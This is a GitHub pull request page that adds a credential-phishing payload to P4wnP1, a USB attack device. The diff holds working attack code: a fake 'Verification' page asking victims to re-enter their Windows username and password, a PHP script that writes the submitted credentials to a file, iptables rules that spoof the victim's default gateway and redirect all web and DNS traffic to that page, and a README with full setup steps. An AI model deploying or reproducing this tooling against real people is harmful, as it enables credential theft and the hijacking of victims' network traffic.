Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Added Payload #152

Open
wants to merge 7 commits into
base: master
Choose a base branch
from
Open

Added Payload #152

Show file tree
Hide file tree
Changes from 1 commit
Commits
Show all changes
7 commits
Select commit Hold shift + click to select a range
6dfa702
Added Payload
Brisk4t Oct 22, 2017
e928f1a
Uses IP variable instead of static
Brisk4t Oct 22, 2017
3cec14a
ECM works now !
Brisk4t Oct 25, 2017
5065496
Edited README.MD
Brisk4t Oct 25, 2017
736ee01
Added a more legit portal
Brisk4t Oct 26, 2017
d11e0bb
Update Captiveportal.txt
Brisk4t Oct 26, 2017
4778838
Update README.md
Brisk4t Oct 26, 2017
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
24 changes: 24 additions & 0 deletions payloads/Captive_Portal/Apache/index.html
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,24 @@
<html>
<head>
<title>Verification</title>
<style type="text/css">
body {
text-align: center;
}
</style>
</head>
<body>
<h1>Please re-enter your Windows username and password</h1>
</form>
<form action="recieve.php" method="POST">
Username <input name="Username" type="text" /><br>
Password <input name="Password" type="password" /><br>
<input type="submit" name="submit" value="Validate">
</form>
</body>
</html>




# Based on portal.html by Hak5 Sebkinne
17 changes: 17 additions & 0 deletions payloads/Captive_Portal/Apache/recieve.php
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,17 @@
<?php
if(isset($_POST['Username']) && isset($_POST['Password'])) {
$file = $_SERVER['REMOTE_ADDR'].".txt";
$data = $_POST['Username'] . '-' . $_POST['Password'] . "\n";
$ret = file_put_contents($file, $data, FILE_APPEND | LOCK_EX);
if($ret === false) {
die('There was an error writing this file');
}
else {
echo "Validation Successful, you may close this tab. ";
}
}
else {
die('no post data to process');
}

# Thanks to Stackoverflow's Floby
40 changes: 40 additions & 0 deletions payloads/Captive_Portal/Captiveportal.txt
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,40 @@
# This file is part of P4wnP1.
#
# Copyright (c) 2017, Marcus Mengs.
#
# P4wnP1 is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# P4wnP1 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with P4wnP1. If not, see <http://www.gnu.org/licenses/>.


#Author: Briskat
#Based on Bash bunny payload by Sebastian Kinne 'Sebkinne'
#=================================
USE_RNDIS=true # Enables USB Ethernet Gadget
USE_HID=true # If you ever want to use ducky scripts with this payload
ROUTE_SPOOF=true # Makes IP of P4wnP1 the default gateway on the victim
#==================================

function setupNetworking() {
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -A INPUT -i usb0 -p udp --dport 53 -j ACCEPT
iptables -A INPUT -i usb0 -p udp --dport 443 -j DROP
iptables -t nat -A PREROUTING -i usb0 -p tcp --dport 443 -j DNAT --to-destination 172.16.0.2:80
iptables -t nat -A PREROUTING -i usb0 -p tcp --dport 80 -j DNAT --to-destination 172.16.0.1:80
iptables -t nat -A PREROUTING -i usb0 -p udp --dport 53 -j DNAT --to-destination 172.16.0.1:53
iptables -t nat -A POSTROUTING -j MASQUERADE
}

service apache2 start # Start apache (must be installed, check out readme for more info)
setupNetworking # Calls function written above to redirect all network traffic (needs more work)
led_blink 3 # blinks led on pi 3 times in a loop

31 changes: 31 additions & 0 deletions payloads/Captive_Portal/README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,31 @@
This is a phishing payload for P4wnP1.
Author : Brisk4t (https://github.com/Brisk4t)
Credits : Sebastian Kinne - Sebkinne (https://github.com/sebkinne)
Stackoverflow's Floby : https://stackoverflow.com/users/1946228/floby

P4wnP1 is made by Mame82 : https://github.com/mame82

######################################################

What does it do :

1. Set's up an apache server with an html form page with username and data fields
2. Redirects all traffic on victim to this page (so google.com goes to your phishing page)
3. Saves collected data to text file using php
4. Comepletely owns victim.

######################################################

Setup

1. Have P4wnP1 (i know, could never guess). Instructions here : https://github.com/mame82/P4wnP1
2. Install apache2 and PHP. Paste the following into terminal : sudo apt-get install apache2 php7.0 libapache2-mod-php7.0 -y
3. Copy contents of 'Apache' folder of this repo into /var/www/html (replce the original index.html)
4. Copy Captiveportal.txt to P4wnP1/payloads
5. Add following line to setup.cfg : PAYLOAD=Captive_Portal/Captiveportal.txt
6. Comment out all other payloads in setup.cfg
7. Reboot P4wnP1

If this is too much reading for you, video coming soon.

######################################################